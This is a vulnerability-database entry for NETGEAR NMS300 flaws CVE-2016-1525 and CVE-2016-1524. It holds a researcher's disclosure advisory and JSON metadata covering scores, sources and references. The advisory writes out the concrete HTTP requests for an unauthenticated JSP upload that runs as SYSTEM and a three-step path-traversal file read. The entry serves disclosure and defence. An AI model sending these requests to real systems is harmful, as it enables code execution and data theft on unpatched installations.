var-201602-0193
Vulnerability from variot
Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
Disclosure: 04/02/2016 / Last updated: 04/02/2016
Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.
Technical details:
1
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated) CVE-2016-1525 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13
There are two servlets that allow unauthenticated file uploads: @RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload
The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name"
[name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream
<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>
A Hello World Example of JSP.
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
2
Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13
Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on C:>&md5=&fileName=
b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000
Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=
Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
References: [1] https://www.kb.cert.org/vuls/id/777024
================ Agile Information Security Limited http://www.agileinfosec.co.uk/
Show details on source websiteEnabling secure digital business >>
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0193",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prosafe network management software 300",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.5.0.11"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netgear",
"version": null
},
{
"model": "prosafe network management system nms300",
"scope": "lte",
"trust": 0.8,
"vendor": "net gear",
"version": "1.5.0.11"
},
{
"model": "management system nms300",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.5.0.11"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:netgear:prosafe_network_management_software_300:1.5.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1525"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pedro Ribeiro of Agile Information Security.",
"sources": [
{
"db": "BID",
"id": "82630"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1525",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-1525",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2016-00973",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-90344",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1525",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2016-00973",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-130",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-90344",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. \nNetgear Management System NMS300 1.5.0.11 and prior are vulnerable. \u003e\u003e Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)\n==========================================================================\nDisclosure: 04/02/2016 / Last updated: 04/02/2016\n\n\n\u003e\u003e Background on the affected product:\n\"NMS300\nProSAFE\u00ae Network Management System\nDiagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network.\"\n\n\n\u003e\u003e Summary:\nNetgear\u0027s NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. \n\nA special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. \n\n\n\u003e\u003e Technical details:\n#1\nVulnerability: Remote code execution via arbitrary file upload (unauthenticated)\nCVE-2016-1525\nAffected versions:\nNMS300 1.5.0.11\nNMS300 1.5.0.2\nNMS300 1.4.0.17\nNMS300 1.1.0.13\n\nThere are two servlets that allow unauthenticated file uploads:\n@RequestMapping({ \"/fileUpload.do\" })\npublic class FileUpload2Controller\n- Uses spring file upload\n\n@RequestMapping({ \"/lib-1.0/external/flash/fileUpload.do\" })\npublic class FileUploadController\n- Uses flash upload\n\nThe JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. \nSo for example if [name] = \"testing\" and [extension] = \".jsp\", the final file will be named \"nulltesting.jsp\". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. \n\nPOST /lib-1.0/external/flash/fileUpload.do HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\n\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"name\"\n\n[name]\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"whatever.[extension]\"\nContent-Type: application/octet-stream\n\n\u003c%@ page language=\"java\" contentType=\"text/html; charset=ISO-8859-1\"\npageEncoding=\"ISO-8859-1\"%\u003e\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=ISO-8859-1\"\u003e\n\u003ctitle\u003eHello World Example\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch2\u003eA Hello World Example of JSP.\u003c/h2\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--\n\n\n#2\nVulnerability: Arbitrary file download (authenticated)\nCVE-2016-1524\nAffected versions:\nNMS300 1.5.0.11\nNMS300 1.5.0.2\nNMS300 1.4.0.17\nNMS300 1.1.0.13\n\nThree steps need to be taken in order to exploit this vulnerability:\na) Add a configuration image, with the realName parameter containing the path traversal to the target file:\nPOST /data/config/image.do?method=add HTTP/1.1\nrealName=../../../../../../../../../../\u003cfile on C:\\\u003e\u0026md5=\u0026fileName=\u003cimagename.img\u003e\u0026version=1337\u0026vendor=Netgear\u0026deviceType=4\u0026deviceModel=FS526Tv2\u0026description=bla\n\nb) Obtain the file identifier (imageId) for the image that was created by scraping the page below for \"imagename.img\" (the fileName parameter in step 1):\nPOST /data/getPage.do?method=getPageList\u0026type=configImgManager\neveryPage=10000\n\nSample response:\n{\"page\":{\"beginIndex\":0,\"recordCount\":7,\"totalRecords\":7,\"currentPage\":1,\"everyPage\":10,\"totalPage\":1},\"list\":[{\"imageId\":\"1\",\"fileName\":\"agga5.img\",\"createTime\":\"10/03/2015 21:12:36\",\"realFileName\":\"../../../../../../../../../../log.txt\",\"vendor\":\"Netgear\",\"deviceType\":\"4\",\"deviceModel\":\"FS526Tv2\",\"version\":\"2323\",\"sizeM\":\"24491\",\"createBy\":\"admin\",\"createId\":\"1\",\"description\":\"bla\\r\\n\"}\n\nc) Download the file with the imageId obtained in step 2:\nGET /data/config/image.do?method=export\u0026imageId=\u003cID\u003e\n\n\n\u003e\u003e Fix: \nNo fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. \n\n\n\u003e\u003e References:\n[1] https://www.kb.cert.org/vuls/id/777024\n\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "PACKETSTORM",
"id": "135618"
}
],
"trust": 3.33
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-90344",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90344"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#777024",
"trust": 4.3
},
{
"db": "NVD",
"id": "CVE-2016-1525",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "135618",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "135999",
"trust": 1.1
},
{
"db": "EXPLOIT-DB",
"id": "39515",
"trust": 1.1
},
{
"db": "EXPLOIT-DB",
"id": "39412",
"trust": 1.1
},
{
"db": "JVN",
"id": "JVNVU96743693",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-00973",
"trust": 0.6
},
{
"db": "BID",
"id": "82630",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90344",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"id": "VAR-201602-0193",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "VULHUB",
"id": "VHN-90344"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00973"
}
]
},
"last_update_date": "2023-12-18T13:24:39.547000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR Download Center - NMS300",
"trust": 0.8,
"url": "http://downloadcenter.netgear.com/en/product/nms300#searchresults"
},
{
"title": "NetgearManagementSystemNMS300 directory traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/71361"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.5,
"url": "http://www.kb.cert.org/vuls/id/777024"
},
{
"trust": 3.3,
"url": "http://seclists.org/fulldisclosure/2016/feb/30"
},
{
"trust": 1.7,
"url": "http://downloadcenter.netgear.com/en/product/nms300#"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/537446/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/39412/"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/39515/"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/135618/netgear-pro-nms-300-code-execution-file-download.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/135999/netgear-prosafe-network-management-system-300-arbitrary-file-upload.html"
},
{
"trust": 1.1,
"url": "http://www.rapid7.com/db/modules/exploit/windows/http/netgear_nms_rce"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1525"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu96743693/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1525"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1525"
},
{
"trust": 0.1,
"url": "http://[host]:8080/null[name].[extension]."
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1524"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/)"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "VULHUB",
"id": "VHN-90344"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-03T00:00:00",
"db": "CERT/CC",
"id": "VU#777024"
},
{
"date": "2016-02-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"date": "2016-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-90344"
},
{
"date": "2016-02-03T00:00:00",
"db": "BID",
"id": "82630"
},
{
"date": "2016-02-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"date": "2016-02-07T17:10:18",
"db": "PACKETSTORM",
"id": "135618"
},
{
"date": "2016-02-13T02:59:10.900000",
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"date": "2016-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-04T00:00:00",
"db": "CERT/CC",
"id": "VU#777024"
},
{
"date": "2016-02-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90344"
},
{
"date": "2016-07-05T21:22:00",
"db": "BID",
"id": "82630"
},
{
"date": "2016-02-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"date": "2018-10-09T19:59:11.457000",
"db": "NVD",
"id": "CVE-2016-1525"
},
{
"date": "2016-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear Management System NMS300 Directory Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00973"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-130"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.